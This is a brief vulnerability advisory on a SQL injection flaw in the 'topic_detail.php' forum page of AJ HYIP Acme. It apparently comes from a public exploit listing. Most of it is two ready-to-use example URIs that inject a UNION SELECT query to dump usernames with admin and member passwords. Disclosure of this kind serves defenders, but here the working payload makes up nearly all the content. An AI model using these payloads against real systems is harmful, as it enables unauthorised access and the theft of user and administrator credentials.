AJ HYIP Acme 'topic_detail.php' SQL Injection Vulnerability

AJ HYIP Acme 'topic_detail.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/patch/forum/topic_detail.php?id=-999999+union+select+0,1,2,concat(username,0x3a,admin_password),4,5,6,7+from+admin/*
http://www.example.com/patch/forum/topic_detail.php?id=-999999+union+select+0,1,2,concat(username,0x3a,password),4,5,6,7+from+members/*